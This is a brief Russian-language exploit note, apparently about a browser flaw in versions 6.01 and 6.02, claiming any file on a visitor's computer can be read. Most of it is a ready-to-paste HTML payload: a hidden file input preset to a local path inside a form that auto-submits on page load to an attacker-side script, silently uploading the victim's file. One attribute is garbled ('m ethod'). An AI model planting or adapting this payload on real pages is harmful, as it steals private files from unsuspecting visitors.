Уязвимые версии 6.01, 6.02. Чтобы просмотреть любой файл на удаленном компьютере, достаточно вставить в страницу следующий код:
<body onload="document.secForm.submit()">
<form m ethod="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\test.txt " style="visibility:hidden">
</form>
</body>
